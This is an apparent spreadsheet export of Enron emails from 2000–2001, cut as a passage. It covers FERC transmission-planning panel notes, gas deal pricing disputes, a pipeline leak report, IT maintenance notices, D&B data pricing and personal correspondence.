s who pays for it, which raises the need for dispute resolution. =20_x000D_
Opening Statements_x000D_
Jose Delgado: ATC is a transmission only company with MISO as the system op=_x000D_
erator.  They view everyone as a customer whose needs are to be met.  They =_x000D_
were formed by divestiture by IOUS, coops and munis and with a $500 million=_x000D_
 asset base initially. Their current ten year plan will add $1billion of in=_x000D_
vestment.   Their top priorities are connecting generation and load. =20_x000D_
Michael Dworkin: Because transmission is a common good, construction affect=_x000D_
s all parties not just one party.  The environmental and permitting of line=_x000D_
s requires a balance of benefits with costs and a long range view.  The ide=_x000D_
a of joint boards should be considered for dealing with multi-state project=_x000D_
s, although FERC has show little interest in joint boards they have been us=_x000D_
ed by FCC.  State input needed because of the local needs and impacts which=_x000D_
 must be considered._x000D_
Mark Maher: FERC must consider the unique characteristics of the West when =_x000D_
considering congestion management.  LMP is not a good fit to hydro systems =_x000D_
with their multiple use obligations.  RTO West is developing a planning pro=_x000D_
cess which will give the RTO the freedom to develop options as we learn in =_x000D_
the future.  The RTO needs a strong centralized planning process._x000D_
Laura Manz: The various aspects of planning are connected.  Pricing (LMP) i=_x000D_
s the key to getting the right signals for expansion of transmission and re=_x000D_
sources.   No competitor should have an advantage over another.  The RTO ne=_x000D_
eds a central planning process but it shouldn't push solutions.  The market=_x000D_
 should decide on solutions. =20_x000D_
Masheed Rosenqvist: The morning discussion of congestion management talked =_x000D_
about hedging against risk.  The planning discussion is not about what we h=_x000D_
ave now, but about how to avoid future congestion.  The Commission has take=_x000D_
n conflicting positions in different cases.  The issues that need to be ans=_x000D_
wered are:  How can merchant transmission be compensated?  Should transmiss=_x000D_
ion projects be open to RFPs?  Is FERC open to market based pricing for exp=_x000D_
ansions? =20_x000D_
Steve Walton:  The most important thing for FERC to do for expansion is to =_x000D_
settle the matter of industry structure do away with the uncertainty that h=_x000D_
as frozen transmission investment.  The RTO debate has been going on for 5 =_x000D_
years or more and needs to be settled.  For expansion to go forward, there =_x000D_
needs to be a clear property right which accrues to the expanding party.  Y=_x000D_
ou are always going to have muddy issues in planning.  For instance if a 13=_x000D_
8 kV line is all that is needed to day, but future considerations of scare =_x000D_
right-of-way say a 345 kV line should be built, who pays for the extra cost=_x000D_
.  In order to resolve such matters the planning process must include a dis=_x000D_
pute resolution process, appeal able to FERC, to decide such matters._x000D_
Discussion_x000D_
Kevin Kelly asked about he fact that some parties benefit form current cong=_x000D_
estion so how does a stakeholder process get things built when some oppose.=_x000D_
  Most agreed that if a party wants to fund construction it should be built=_x000D_
 with the beneficiaries funding.  Michael Dworkin expressed concerns about =_x000D_
use of eminent domain to build which means a benefit test must exist to say=_x000D_
 this is the best solution, i.e. least cost planning.  This lead to discuss=_x000D_
ion of the need for the RTO to be provider of information to all parties so=_x000D_
 they can make intelligent decisions. =20_x000D_
Commissioner Massey asked about whether the system was (a) under built and =_x000D_
needed lots of expansion so don't worry about overbuilding or (b) transmiss=_x000D_
ion planning should consider all options before construction of new facilit=_x000D_
ies.  The panel agreed that pricing needs to be a prime determinant in the =_x000D_
process.  Michaela Dworkin worried that overbuilding distorts decisions.  L=_x000D_
aura Manz felt that the term "under built" is a secondary effect of not hav=_x000D_
ing proper pricing of locational prices to guide parties._x000D_
Dick O'Neil asked if LMP will work in the West.  Mark Maher said it wouldn'=_x000D_
t.  Laura Manz said it applies everywhere because of physics, they manage h=_x000D_
ydro facilities in PJM.  Michael Dworkin said LMP means an explicit measure=_x000D_
 of cost of congestion and the value of generation at locations and ought n=_x000D_
ot to be rejected just intelligently designed.  BPA is looking pricing mode=_x000D_
l but LMP won't work.  Steve Walton said LMP needed for real time dispatch,=_x000D_
 but given the nature of the Northwest hydro system it must have some "twea=_x000D_
ks" like bilaterals and allow operator self-schedule output levels to permi=_x000D_
t  river coordination.  Hydro system optimizes over weeks and months to max=_x000D_
imize firm energy production not on an hour to hour basis.  PJM has hydro, =_x000D_
but not 70% as in the Northwest.  Implementation will be different because =_x000D_
such thing as unit commitment are different when you have primarily hydro a=_x000D_
nd base load coal._x000D_
In the summation at the end of the panel, four principles were listed:  (1)=_x000D_
 RTO must provide information, (2) RTO should identify solutions, (3) RTO s=_x000D_
hould be unbiased and (4) the RTO should be accountable.  The disagreement =_x000D_
was over the last two points, Michael Dworkin felt that #3 (unbiased) was c=_x000D_
ritical and that #4 (accountability) was accomplished by having regulators =_x000D_
involved in governance.  Jose Delgado said and Transco can't be unbiased si=_x000D_
nce it provides services, although the ISO above it can be, but accountabil=_x000D_
ity is based on loosing your investment if you make an mistake.  This last =_x000D_
point really comes down to a preference for ISO over Transco forms and the =_x000D_
tension which exist because unbiased and accountability issues._x000D_
Steve</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 03:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Deer Valley</t>
  </si>
  <si>
    <t>I like it when you call me sailor._x000D_
PL</t>
  </si>
  <si>
    <t>Tue, 4 Apr 2000 13:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bethel@babson.edu', 'abutler@finance.bus.lsu.edu', 'sgillan@tiaa-cref.org', 'sirri@babson.edu', 'parrino@mail.utexas.edu', 'daveike@rice.edu', 'matthias.kahl@anderson.ucla.edu', 'eronn@mail.utexas.edu', 'asubrahm@anderson.ucla.edu', 'fdiebold@stern.nyu.edu', 'bill_petty@baylor.edu', 'beth.miertschin@enron.com', 'hong.yan@bus.utexas.edu', 'maxwell@ba.ttu.edu', 'jhund@mail.utexas.edu', 'jhartzel@stern.nyu.edu', 'harper1@u.washington.edu', 'asayrak@katz.pitt.edu', 'chapman@eco.utexas.edu', 'grullon@rice.edu', 'wangfa@rice.edu', 'cindy.justice@enron.com', 'lederington@ou.edu', 'j_martin@baylor.edu', 'aagrawal@cba.ua.edu', 'kemals@mail.utexas.edu', 'suarez@cemfi.es', 'stathis.tompaidis@bus.utexas.edu', 'jarradh@oregon.uoregon.edu', 'ramnath@rice.edu', 'lstarks@mail.utexas.edu', 'andras.marosi@bus.utexas.edu', 'dgromb@mit.edu', 'steve_rich@baylor.edu', 'andres.almazan@bus.utexas.edu', 'tyrone.callahan@bus.utexas.edu', 'titman@mail.utexas.edu', 'tnoe@mailhost.tcs.tulane.edu', 'kent@kent.kellogg.nwu.edu', 'zkhokher@mail.utexas.edu', 'mbinay@mail.utexas.edu', 'metrick@wharton.upenn.edu', 'carlsonm@mail.utexas.edu', 'jegadees@uiuc.edu', 'stice@mailhost.tcs.tulane.edu', 'alynch@debit.stern.nyu.edu', 'rampini@nwu.edu', 'mpuri@stanford.edu', 'vince.j.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Last minute things</t>
  </si>
  <si>
    <t xml:space="preserve">TFF Participants,_x000D_
_x000D_
We are looking forward to seeing everyone in San Antonio this Friday._x000D_
Attached is a welcome letter that indicates the meeting room and describes_x000D_
the two evenings (Friday dinner and tour of the Alamo and Saturday barbeque_x000D_
dinner at a ranch outside of San Antonio).  We have arranged for five_x000D_
horses for the brave at heart and a hayride for the interested so come with_x000D_
jeans and boots._x000D_
_x000D_
See you Friday_x000D_
_x000D_
John_x000D_
 - Welcome1.doc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t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 10:32:41 -0800 (PST)</t>
  </si>
  <si>
    <t>The following item was presented in this week's corporate change control...._x000D_
_x000D_
Dec. 28_x000D_
Beginning at 5:00 p.m., the Corporate server team will remove domain controllers CORPHOU-DCARD02 and CORPHOU-DCARD03 from service to be rebuilt.  These are just two of the numerous active domain controllers within the Corp domain.  There should be no disruption of service as user requests should automatically be redirected to an active domain controller.  Once these servers are rebuilt, they will be returned to the Corp domain._x000D_
_x000D_
Dec. 31_x000D_
From 8:00 a.m. - 12:00 p.m., the Corporate server team will move ECTHOU-HR1 to the Ardmore data center.  This move will result in a total disruption of service for those HR users whose S:\ drive is mapped to this server._x000D_
_x000D_
Jan. 7_x000D_
From 7:00 a.m. through 1/11 at 5:00 p.m., Facilities will perform the annual maintenance on the rooftop chillers.  The chillers will be taken down one at a time during the maintenance.  No impact to ETS is expected._x000D_
_x000D_
ETS Solution Center - Houston, at 713-345-4745_x000D_
ETS Solution Center - Omaha, at 402-398-7454</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 09:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wmontjoy@brunini.com'})</t>
  </si>
  <si>
    <t>Hi Wilson,_x000D_
_x000D_
We discussed asking the counterparties for opinion letters.  Could you _x000D_
outline what you think we should ask for, or alternatively, just draft it?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 27 Jul 2001 11:48:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>The Houston Expl Dec 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Darren:_x000D_
Elizabeth Hernandez fixed this deal for me.  I don't need for you to look i=_x000D_
nto it.  Thanks anyway._x000D_
---------------------- Forwarded by Megan Parker/Corp/Enron on 07/27/2001 0=_x000D_
1:46 PM ---------------------------_x000D_
  =20_x000D_
_x000D_
=09  From:  Megan Parker                           07/19/2001 10:27 AM=09_x000D_
=09=09_x000D_
_x000D_
_x000D_
To:=09Daren J Farmer/Enron@EnronXGate_x000D_
cc:=09=20_x000D_
_x000D_
Subject:=09The Houston Expl Dec 2000_x000D_
_x000D_
Daren:_x000D_
I'm not sure if you can help me, but I have a Danny Conner deal from Decemb=_x000D_
er 2000 that has a price issue. =20_x000D_
_x000D_
We were buying gas from The Houston Exploration Company on Black Marlin, Hi=_x000D_
gh Island 138/HPL meter 98663, deal 508426.  The deal was priced at HSC - 0=_x000D_
.14.  In December, a new platform came on, High Island 115/HPL meter 986431=_x000D_
.  It did not start flowing until the 20th.  Danny did not put a new deal i=_x000D_
n for this meter, so we combined the gas on deal 508426.  The Houston Explo=_x000D_
ration thinks that the gas at HI 115 should be kept separate and priced at =_x000D_
HSC GD - 0.14 since it did not begin flowing until the 20th.  We agree that=_x000D_
 we received the gas.  We have the pipeline statement from Black Marlin.  W=_x000D_
e just don't have the same pricing.  The Houston Exploration shows that we =_x000D_
owe them an additional $222k due to this price difference.  We only purchas=_x000D_
ed this gas in Dec 2000 and Jan 2001.  The deal for Jan, 547063, was priced=_x000D_
 at GD - 0.14.  Can you verify how this deal should be priced?  I sent this=_x000D_
 issue to Danny back in January and he said the IF price was correct, but T=_x000D_
he Houston Exploration is sticking to their price.  If you need to talk to =_x000D_
their trader, his name is Lester Lipperdt 713-830-6960._x000D_
_x000D_
Megan_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 08:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maureen.raymond@enron.com'})</t>
  </si>
  <si>
    <t>Maureen,_x000D_
_x000D_
Your presentation:_x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 03:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.causey@enron.com', 'john.sherriff@enron.com', 'timothy.detmering@enron.com', 'jeff.donahue@enron.com', 'ken.rice@enron.com', 'mark.muller@enron.com', 'stanley.horton@enron.com', 'andrew.fastow@enron.com', 'david.delainey@enron.com', 'james.derrick@enron.com', 'lou.pai@enron.com', 'julie.armstrong@enron.com', 'mark.frevert@enron.com', 'kevin.hannon@enron.com', 'mark.metts@enron.com', 'rebecca.carter@enron.com', 'susan.skarness@enron.com', 'kenneth.lay@enron.com', 'steven.kean@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>Farewell dinner for Cliff Baxter</t>
  </si>
  <si>
    <t>On Thursday, May 31, Jeff Skilling is hosting a farewell dinner for Cliff _x000D_
Baxter at Brennan's.  You and your spouse/guest are invited.  Given the short _x000D_
timeframe under which we are working, I wanted to get it on your calendar _x000D_
sooner rather than later.  Formal invitations will be sent to your home _x000D_
within the next week.  SRS</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 06:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Tenaska Gas management Agreement</t>
  </si>
  <si>
    <t>Daren,_x000D_
Can you get me the specifics on the Consumer Price Index as you all would _x000D_
like to see it referenced in the agreement. Is there a specific publication _x000D_
that I can reference like I do for HSC proces in the first of the month _x000D_
Inside FERC --let me know</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 01:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cindy.derecskey@enron.com', "earlene.o'connell@enron.com", 'miyung.buster@enron.com', 'margo.reyna@enron.com', 'marcia.linton@enron.com', 'eric.benson@enron.com', 'ginger.dernehl@enron.com', 'richard.shapiro@enron.com', 'lynnette.barnes@enron.com', 'steven.kean@enron.com', 'angela.wilson@enron.com', 'sharonda.stephens@enron.com', 'sara.davidson@enron.com', 'linda.lawrence@enron.com', 'gus.perez@enron.com', 'carolyn.cooney@enron.com', 'james.steffes@enron.com', 'maureen.mcvicker@enron.com', 'mark.palmer@enron.com', 'stephanie.mcmurray@enron.com', 'elizabeth.labanowski@enron.com'})</t>
  </si>
  <si>
    <t>Maternity Leave</t>
  </si>
  <si>
    <t xml:space="preserve"> FYI - Today will be my last full day in the office.  I plan to work at least _x000D_
partial days from home until the baby arrives, monitoring e-mail and working _x000D_
on a few ongoing projects, and will be reachable at the numbers listed _x000D_
below.  Once I head for the hospital I'll change my voicemail to indicate _x000D_
that I'm out of service for a while, and will reference the people who will _x000D_
be responsible for the various activities in my group._x000D_
_x000D_
Home phone:  281-528-6606_x000D_
Home fax:  281-288-0277_x000D_
Pager:  888-740-9948_x000D_
Cell:  713-417-9188_x000D_
_x000D_
Unless something happens between now and then, I plan to be on Steve's staff _x000D_
call on Friday morning at 9:30, and will hold a Info/Admin staff call on _x000D_
Friday morning at 11:00.  (Clerical staff don't need to be on that call.)  _x000D_
(Gus - Please set up this conference call.)_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 05:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: spreadsheet</t>
  </si>
  <si>
    <t xml:space="preserve">I've got an idea.  Howzabout Ted cooks and you clean up?  Seriously, though, _x000D_
I'll try to host next time at my humble apartment._x000D_
_x000D_
_x000D_
_x000D_
	Jacqueline Kelly &lt;JKelly@FairIsaac.com&gt;_x000D_
	11/09/2000 01:31 PM_x000D_
		 _x000D_
		 To: "'Jeff.Dasovich@enron.com'" &lt;Jeff.Dasovich@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: spreadsheet_x000D_
_x000D_
No problemo!  Maybe I will cook for us next time...oh, that's right I don't_x000D_
cook anymore..._x000D_
_x000D_
I thought we did a good job of cranking things out.  Have a good weekend!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Thursday, November 09, 2000 10:12 AM_x000D_
To: Jacqueline Kelly_x000D_
Subject: Re: spreadsheet_x000D_
_x000D_
_x000D_
_x000D_
thanks again for hosting.  most kind of you, and we seemed to make a lot of_x000D_
progress.  did you get enough money for dinner?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 05:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daren.farmer@enron.com', 'clem.cernosek@enron.com'})</t>
  </si>
  <si>
    <t>Re: System 550 Unmetered Gas</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Becky Pitre/HOU/ECT on 06/05/2000 11:58 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Patricia Kirkwood @ ENRON                           05/23/2000 10:14 AM_x000D_
	_x000D_
_x000D_
To: Becky Pitre/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: System 550 Unmetered Gas_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Patricia Kirkwood/GPGFIN/Enron on _x000D_
05/23/2000 10:11 AM ---------------------------_x000D_
_x000D_
_x000D_
Tommy Hicks_x000D_
05/15/2000 10:57 AM_x000D_
To: Patricia Kirkwood/GPGFIN/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: System 550 Unmetered Gas_x000D_
_x000D_
 Use the 802 unmetered number for Edna._x000D_
thanks_x000D_
thicks_x000D_
_x000D_
---------------------- Forwarded by Tommy Hicks/GCO/Enron on 05/15/2000 10:55 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Patricia Kirkwood                           05/15/2000 10:17 AM_x000D_
	_x000D_
_x000D_
To: Pat Flavin/GCO/Enron@ENRON, Tom Cathey/GCO/Enron@ENRON, Tommy _x000D_
Hicks/GCO/Enron@ENRON, Sam Shaw/GCO/Enron@ENRON_x000D_
cc: Gary Anderson/GPGFIN/Enron@ENRON, Cheryl Jones/GPGFIN/Enron@ENRON, Esther _x000D_
Garcia/GPGFIN/Enron@ENRON, Peggy Cameron/GPGFIN/Enron@ENRON, Clara _x000D_
Davis/GPGFIN/Enron@ENRON _x000D_
_x000D_
Subject: Re: System 550 Unmetered Gas  _x000D_
_x000D_
Which unmetered station is to be used: 802,812,830,831,860 or 950?_x000D_
_x000D_
_x000D_
_x000D_
Tommy Hicks_x000D_
05/15/2000 08:49 AM_x000D_
To: Cheryl Jones/GPGFIN/Enron@ENRON, Esther Garcia/GPGFIN/Enron@ENRON, _x000D_
Patricia Kirkwood/GPGFIN/Enron@ENRON, Gary Anderson/GPGFIN/Enron@ENRON_x000D_
cc: Pat Flavin/GCO/Enron@ENRON, Tom Cathey/GCO/Enron@ENRON _x000D_
_x000D_
Subject: System 550 Unmetered Gas_x000D_
_x000D_
 On 5/10/00 a pipeline leak was found on system 550.  By the evidence found _x000D_
it is believed to have been present for several months. We need to go back to _x000D_
at least January '00 for corrections.  Please input this gas loss to the _x000D_
system 550 balance. The estimated gas loss for January through April is as _x000D_
follows:_x000D_
_x000D_
 January: 103,058 MCF 105,066 DTH_x000D_
 February: 97,219 MCF 99,114 DTH_x000D_
 March:  106,015 MCF 108,082 DTH_x000D_
 April:  95,214 MCF 97,070 DTH_x000D_
_x000D_
_x000D_
Gas loss for May will be forwarded as soon as we obtain the pressure readings _x000D_
from meter _x000D_
986501-10.                                                                    _x000D_
                                   Attached is the supporting documentation _x000D_
used to calculate these volumes:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
If you have any questions please call._x000D_
_x000D_
thanks_x000D_
thicks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 05:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nadine.costanzo@enron.com'})</t>
  </si>
  <si>
    <t>Testing Reports including External Exchanges</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kate,_x000D_
_x000D_
I hope you had a Happy New Year's._x000D_
_x000D_
Sorry we forgot to include you on the initial email.  Could you please _x000D_
coordinate the User Acceptance Testing with your group for the various _x000D_
reports that were listed below?  As Laura explained, those reports were _x000D_
changed to include a field necessary for those deals that came from an  _x000D_
External Exchange (Houston Street, Dynegy Direct, True Quote) through EOL._x000D_
_x000D_
Thanks for all your help.   Please let Laura or myself know if you find any _x000D_
problem with the reports._x000D_
Nadine._x000D_
(713)853-9863._x000D_
_x000D_
----- Forwarded by Nadine Costanzo/Corp/Enron on 01/02/2001 01:01 PM -----_x000D_
_x000D_
	Laura Aldis_x000D_
	01/02/2001 11:45 AM_x000D_
		 _x000D_
		 To: Corry Bentley/HOU/ECT@ECT, Stacey W White/HOU/ECT@ECT, Kim S _x000D_
Theriot/HOU/ECT@ECT, Thresa A Allen/HOU/ECT@ECT, Debbie R _x000D_
Brackett/HOU/ECT@ECT, Monica Lande/PDX/ECT@ECT, Cara Semperger/PDX/ECT@ECT, _x000D_
Valarie Sabo/PDX/ECT@ECT_x000D_
		 cc: Nadine Costanzo/Corp/Enron@Enron_x000D_
		 Subject: Testing Reports including External Exchanges_x000D_
_x000D_
Hello.  Hope everyone's holiday was pleasant!_x000D_
_x000D_
Nine reports have been promoted to Stage and are in need of User Acceptance _x000D_
Testing.  These reports have not been changed except to add a field that _x000D_
allows you to filter in or out the external exchange information, if the deal _x000D_
was brought into EnPower via EOL via an external exchange, such as Houston _x000D_
Street or True Quote.  EOL is scheduled to start adding these deals very soon _x000D_
and we want you to be ready._x000D_
_x000D_
To test the reports, please enter deals into the system and add your own EOL _x000D_
number, use the dropdown to pick an External Exchange, and add your own _x000D_
External Exchange number.  Then you can track your deal through the system._x000D_
_x000D_
I have attempted to identify who would normally use these reports, but if I _x000D_
am inaccurate, please just reshuffle them to the appropriate party.  And let _x000D_
me know where I am wrong so I can make a note for next time.  Also, I do not _x000D_
have a list of which reports the Portland office might use so please just _x000D_
test the ones you do use.  _x000D_
_x000D_
AggSchVol    Corry Bentley_x000D_
ConCount    Kim Theriot_x000D_
CPConfirm    Kim Theriot_x000D_
CPTerm    Kim Theriot_x000D_
Credit     Debbie Brackett_x000D_
Emissions    Stacey White_x000D_
EOL Report (4 tabs within this one) Kim Theriot_x000D_
FollowUp    Kim Theriot_x000D_
HighPriceDeals    Kim Theriot_x000D_
_x000D_
Thanks so much for your assistance!  Let me know of any issues you find _x000D_
immediately so we can address them promptly.  _x000D_
Laura Aldis_x000D_
Quality Assurance, EnPower Production Support_x000D_
713-345-4410_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 May 2000 06:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'bryan.seyfried@enron.com'})</t>
  </si>
  <si>
    <t>Dun &amp; Bradstreet Info for Credit Trading</t>
  </si>
  <si>
    <t xml:space="preserve">I have received preliminary information from D&amp;B.  I think several _x000D_
issues/questions have been raised that if explored, could result in a better _x000D_
solution for the money.  _x000D_
_x000D_
Option 1_x000D_
The update frequency for our current file can be improved from quarterly to _x000D_
monthly for a cost of $87,000 (USD) through March, 2001._x000D_
_x000D_
Option 2_x000D_
I wasn't sure what specific data in the file you might be interested in.  If _x000D_
you are particularly interested in the Financial Stress Score and Credit _x000D_
Score, for example, there are multiple alternatives :_x000D_
 _x000D_
 2a) Keep quartlery refresh of base data (party name, etc) and refresh scores _x000D_
that are added/changed on a monthly basis.  Cost - $1.17(USD) per _x000D_
record.          Note that there are 575,000 records in the file currently _x000D_
with financial and credit scores, making this potentially a very expensive _x000D_
alternative _x000D_
        (575,000 X 1.17=$ 672,750)._x000D_
_x000D_
 2b) Batch or FTP updates of the financial and stress scores can only be _x000D_
provided monthly.  D&amp;B is working on a solution that would provide a _x000D_
weekly         update to their customers in a batch or FTP manner, but has _x000D_
not committed to when this will be ready.  Therefore, if more timely updates _x000D_
than monthly                          are desired, it is also possible to _x000D_
transactionally access records one at a time using D&amp;B's software.  The cost _x000D_
for this is extremely high at $10.52         (USD) per score. _x000D_
_x000D_
Option 3_x000D_
D&amp;B Connect Product._x000D_
 D&amp;B Connect is a tool set of matching software, an externally validated _x000D_
reference file, credit and marketing information, and D&amp;B services that _x000D_
enables the  most effective integration of customer information and _x000D_
third-party information with D&amp;B information.  Only this type of process and _x000D_
information integration  capability can facilitate and ensure accurate _x000D_
identification, linkage and maintenance of your customer's complete _x000D_
relationship.   In addition, D&amp;B Connect  assures organizations of _x000D_
referential integrity by providing an automated and electronic link to D&amp;B so _x000D_
that the most recent D&amp;B information is always  transmitted to your _x000D_
organization and updated within your local D&amp;B Connect Reference File.  D&amp;B _x000D_
Connect is scalable.  _x000D_
_x000D_
 Cost Typically ranging from_x000D_
 * Customer Access Module (CAM) Batch- - $25,000_x000D_
 * CAM Online - $50,000_x000D_
 * Full Information Integrator - $350,000 + data_x000D_
_x000D_
With more specifics as to your needs, this option should perhaps be pursued._x000D_
_x000D_
_x000D_
Questions/Issues_x000D_
_x000D_
1) D&amp;B had questions regarding the use of their data and whether Enron _x000D_
customers would be offered this information for a fee or free.  I explained _x000D_
that I  did not feel the data would be offered directly to Enron customers, _x000D_
but that it would be used to support analysis that would be available _x000D_
externally via web  site, etc.  All pricing above is based upon this _x000D_
understanding.  If I have not portrayed the usage correctly, it will be _x000D_
imperative to get a better understanding  before final pricing can be _x000D_
negotiated._x000D_
_x000D_
2)  Are there specific data elements that you are interested in ?  _x000D_
Alternatives may vary by data element.  Financial Stress Score and Credit _x000D_
Score reference  above were explored as an example._x000D_
_x000D_
3)  What is timeframe for needing a solution ?_x000D_
_x000D_
4)  Financial Stress Score and Credit Score are only available on U.S. _x000D_
companies.  A comparable measure - Global Failure Score (the liklihood of _x000D_
default or  bankruptcy)  is available for international companies.  This _x000D_
rating score however, is NOT currently available via a batch or FTP manner.  _x000D_
This could result  in additional cost if we wish to pursue obtaining this _x000D_
score in a batch manner._x000D_
_x000D_
5)  Pricing also varies whether the information is to be used for credit _x000D_
analysis or risk management decisions versus for marketing purposes.  This is _x000D_
probably  negotiable as the data is the same.  The thought process is that if _x000D_
the repository is used for credit or risk decisions, D&amp;B will see decreased _x000D_
usage and  revenue on a transactional basis by the credit departments._x000D_
_x000D_
 If you would like me to follow up further, please give me a call at _x000D_
713-853-6079._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 10:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Possible video conf this week</t>
  </si>
  <si>
    <t xml:space="preserve">Joe,_x000D_
Sorry for the big delay in all my responses.  I'm out on vacation Wed - Wed. _x000D_
and can't make the video call. Please don't hesitate to set up with _x000D_
Shankman.  In general he is very on board with a big effort in Asia and _x000D_
realizes my views on Asia and that we have issues in Singapore.  Japan will _x000D_
be a  real focus for Enron Global Markets.  He could use an update._x000D_
mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joseph P Hirl@ENRON_x000D_
08/27/2000 05:49 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Possible video conf this week_x000D_
_x000D_
Mike,_x000D_
_x000D_
Would it be possible to get yourself and Shankman on a video call sometime _x000D_
this week?  While we have given you an update a little over a month ago, _x000D_
quite a bit has happened since then.  This might also be a good intro for _x000D_
Shankman, particularly before we can you the both of you over this way._x000D_
_x000D_
Wed your time would be preferable... but we are flexible._x000D_
_x000D_
Joe_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 12:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rodf@telusplanet.net'})</t>
  </si>
  <si>
    <t>Thanks for you help_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Rod Forsythe" &lt;rodf@telusplanet.net&gt;@ENRON [mailto:IMCEANOTES-+22Rod+20Forsythe+22+20+3Crodf+40telusplanet+2Enet+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, August 30, 2001 10:48 AM_x000D_
To:	Mckay, Jonathan_x000D_
Subject:	RE:_x000D_
_x000D_
Hi John, this is Kim.  Royal LePage Relocations will handle absolutely_x000D_
everything.  You don't have to worry about a thing.  They will pay you when_x000D_
all is done.  If you need to get a hold of them, just let me know and I can_x000D_
forward a phone number and contact._x000D_
_x000D_
Hope it's not too hot down there!!_x000D_
_x000D_
Take care,_x000D_
Kim_x000D_
_x000D_
-----Original Message-----_x000D_
From:	Jonathan.Mckay@enron.com [mailto:Jonathan.Mckay@enron.com]_x000D_
Sent:	August 29, 2001 2:34 PM_x000D_
To:	rodf@telusplanet.net_x000D_
Subject:	RE:_x000D_
_x000D_
Hi Rod,_x000D_
_x000D_
I'm sorry I have not been reachable but I was waiting until I had all the_x000D_
info you needed before I contacted you.  The new info is as follows:_x000D_
_x000D_
#1808, 909 Texas Ave._x000D_
Houston, Texas, 77002_x000D_
_x000D_
jonathan.mckay@enron.com_x000D_
_x000D_
(h) 713 225-1230_x000D_
(w) 713 853-4810_x000D_
(f) 713 646-8453_x000D_
_x000D_
_x000D_
Do you know what happens next?  Do I need a lawyer?  Do any other_x000D_
provisions remain?  Any idea how I get paid? Any help would be appreciated!_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Jon_x000D_
_x000D_
_x000D_
As for golf course, I was thinking I'd meet you at Pebble_x000D_
Beach..........Just kidding._x000D_
_x000D_
_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "Rod Forsythe" &lt;rodf@telusplanet.net&gt;@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-+22Rod+20Forsythe+22+20+3Crodf+40telusplanet+2Enet+3E+40E_x000D_
NRON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Wednesday, August 29, 2001 1:18 PM_x000D_
   To:     Mckay, Jonathan_x000D_
   Subject:_x000D_
_x000D_
   Hello John,_x000D_
_x000D_
   Your home looks great with a sold sign on it. Yes it is sold. The only_x000D_
   thing_x000D_
   I need now is your new address, phone # and any new e-mail addresses you_x000D_
   might have._x000D_
_x000D_
   Good luck John I owe you a round of golf at a course of your choosing,_x000D_
   say_x000D_
   hi to the gang and I will be in touch._x000D_
_x000D_
   Have a great day,_x000D_
_x000D_
   Rod Forsythe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Re: FW: Consulting Agreements with lobbyists</t>
  </si>
  <si>
    <t xml:space="preserve">We have not made this payment.  _x000D_
_x000D_
_x000D_
_x000D_
	Kathleen Carnahan/ENRON@enronXgate_x000D_
	05/23/2001 10:46 AM_x000D_
		 _x000D_
		 To: Marchris Robinson/NA/Enron@Enron_x000D_
		 cc: Kay Mann/Corp/Enron@Enron, Greg Krause/ENRON@enronXgate_x000D_
		 Subject: FW: Consulting Agreements with lobbyists_x000D_
_x000D_
Marchris,_x000D_
_x000D_
I am getting ready to request a wire transfer in the amount of $7,500 to be _x000D_
